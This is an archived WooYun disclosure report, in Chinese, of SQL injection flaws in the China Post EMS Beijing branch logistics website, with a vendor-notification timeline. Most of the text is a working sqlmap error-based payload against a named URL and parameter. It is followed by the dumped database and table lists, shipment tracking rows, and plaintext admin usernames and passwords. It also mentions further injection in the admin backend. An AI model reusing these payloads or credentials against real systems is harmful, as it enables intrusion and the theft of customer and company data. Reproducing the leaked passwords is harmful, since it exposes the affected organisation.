乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-09: 细节已通知厂商并且等待厂商处理中 2016-04-09: 厂商已经确认,细节仅向厂商公开 2016-04-19: 细节向核心白帽子及相关领域专家公开 2016-04-29: 细节向普通白帽子公开 2016-05-09: 细节向实习白帽子公开 2016-05-24: 细节向公众公开
多个地方SQL注入
http://www.bj-cnpl.com
中 国 邮 政 速 递 物 流 股 份 有 限 公 司 北 京 市 分 公 司 系统多处存在SQL注入,泄露一些运单信息
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1
orderno存在SQL注入
current user: 'cnpluser'
Parameter: #1* (URI) Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005available databases [6]:[*] AT[*] ATRACK[*] master[*] model[*] msdb[*] tempdb
Database: ATRACK[19 tables]+---------------------+| CNPL_DNJ_REDOC || Logistic_DNJ || Logistic_POD_Status || Logistic_Russia || Logistic_Shipment || Logistic_State || Logistic_Upload_D || Logistic_Upload_I || Logistic_Upload_M || Logistic_User || MAN_DT || MAN_HD || atrackdssw21 || atrackdssw22 || atrackdssw23 || atrackdssw24 || atrackdssw25 || sysdiagrams || 中邮与俄方状态对照表|+---------------------+
Database: ATRACK+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.Logistic_State | 1641873 |转运信息| dbo.CNPL_DNJ_REDOC | 348257 || dbo.Logistic_Upload_I | 1259 || dbo.Logistic_Upload_M | 1237 || dbo.Logistic_Shipment | 941 || dbo.Logistic_POD_Status | 47 || dbo.Logistic_Russia | 23 || dbo.MAN_DT | 17 || dbo.Logistic_User | 11 || dbo.Logistic_Upload_D | 6 || dbo.MAN_HD | 6 || dbo.Logistic_DNJ | 1 |+-------------------------+---------+
Table: Logistic_State[3 entries]+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+| 10000 | BPIL870050205 | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心 | admin | Arrived on an airport warehouse | Moscow, Russia | 11 10 2012 3:00PM | <blank> | <blank> | STA 56 || 100000 | CT287578855CN | 02 27 2014 9:06AM | Shipment Out of Delivery | 快件外出派送 | admin | <blank> | CANADA | 02 26 2014 12:19PM | <blank> | <blank> | SH003 || 1000000 | 98723A925 | 09 22 2015 8:25AM | Shipment forwarded | 快件转运 | admin | <blank> | 东莞 | 09 22 2015 6:57AM | <blank> | <blank> | SH272 |+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
用户密码什么的没有加密
+------------------+--------------------+---------------------+-----------------------+------------------------+| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |+------------------+--------------------+---------------------+-----------------------+------------------------+| 1 | admin | ADMIN | YES | lzyouzheng || 10 | emskf | ADMIN | YES | kefuzhongxin || 11 | guoji | ADMIN | YES | guojifengongsi |+------------------+--------------------+---------------------+-----------------------+------------------------+
登陆后台,发现后台又有SQL注入新添加状态,填入“'”
另外两处
危害等级:中
漏洞Rank:5
确认时间:2016-04-09 20:12
谢谢。
暂无